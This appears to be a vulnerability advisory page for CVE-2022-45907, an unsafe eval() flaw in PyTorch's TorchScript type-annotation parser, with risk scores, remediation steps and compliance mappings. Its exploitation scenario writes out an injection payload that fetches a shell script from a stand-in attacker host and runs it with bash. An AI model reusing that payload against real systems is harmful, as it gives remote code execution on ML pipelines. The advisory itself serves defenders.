CVE-2022-45907 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

Any PyTorch deployment processing untrusted model files or scripts is exposed to unauthenticated remote code execution — this includes model serving APIs, MLOps pipelines, and shared training infrastructure. Patch immediately to commit 767f6aa or later. Treat all PyTorch processes handling external model inputs as a high-privilege attack surface until patched.

Risk Assessment

Critical. CVSS 9.8 with network-accessible, zero-auth, zero-interaction exploitation. PyTorch is the dominant ML framework across both research and production, making the blast radius enormous. Exploitation is trivial — crafting a malicious type annotation string requires no specialized ML knowledge. Unpatched model serving endpoints or collaborative ML platforms (Jupyter, MLflow, Weights & Biases integrations) represent the highest-risk exposure.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
pytorch	pip	—	No patch
99.8K OpenSSF 6.4 21.9K dependents Pushed today 8% patched ~142d to patch Full package profile →

Do you use pytorch? You're affected.

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

0.8%

chance of exploitation in 30 days

Higher than 74% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

Recommended Action

5 steps

Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a version past PyTorch trunk/89695.
Workaround: block processing of untrusted PyTorch model files until patched; enforce allowlisting of model sources in MLOps pipelines.
Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress.
Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference/training processes.
Audit: inventory all systems loading external .pt/.pth files or TorchScript definitions — prioritize public-facing model APIs.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Inference AML.T0010.001 - AI Software AML.T0011.000 - Unsafe AI Artifacts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.8.1 - AI system development processes

NIST AI RMF

MANAGE 2.4 - Residual risks from AI system components are monitored and managed

OWASP LLM Top 10

LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2022-45907?

Any PyTorch deployment processing untrusted model files or scripts is exposed to unauthenticated remote code execution — this includes model serving APIs, MLOps pipelines, and shared training infrastructure. Patch immediately to commit 767f6aa or later. Treat all PyTorch processes handling external model inputs as a high-privilege attack surface until patched.

Is CVE-2022-45907 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-45907, increasing the risk of exploitation.

How to fix CVE-2022-45907?

1. Patch: apply commit 767f6aa49fe20a2766b9843d01e3b7f7793df6a3 or upgrade to a version past PyTorch trunk/89695. 2. Workaround: block processing of untrusted PyTorch model files until patched; enforce allowlisting of model sources in MLOps pipelines. 3. Isolate: run model loading and inference in sandboxed containers with minimal permissions and no network egress. 4. Detect: alert on unexpected subprocess creation, outbound connections, or file writes originating from PyTorch inference/training processes. 5. Audit: inventory all systems loading external .pt/.pth files or TorchScript definitions — prioritize public-facing model APIs.

What systems are affected by CVE-2022-45907?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, model registries, MLOps pipelines, inference APIs.

What is the CVSS score for CVE-2022-45907?

CVE-2022-45907 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 0.79%.

Technical Details

NVD Description

In PyTorch before trunk/89695, torch.jit.annotations.parse_type_line can cause arbitrary code execution because eval is used unsafely.

Exploitation Scenario

An adversary publishes a malicious PyTorch model file to a public model hub (e.g., Hugging Face) or injects it into a shared model registry. The file contains a crafted TorchScript type annotation: parse_type_line receives a string like '__import__("os").system("curl attacker.com/shell.sh | bash")' as a type hint. When any downstream ML pipeline loads this model for inference or fine-tuning, PyTorch's JIT compiler processes the annotation via eval(), executing the payload with the service's OS-level privileges. No authentication, user interaction, or ML expertise required — the exploit is effectively a supply chain attack against every consumer of the poisoned artifact.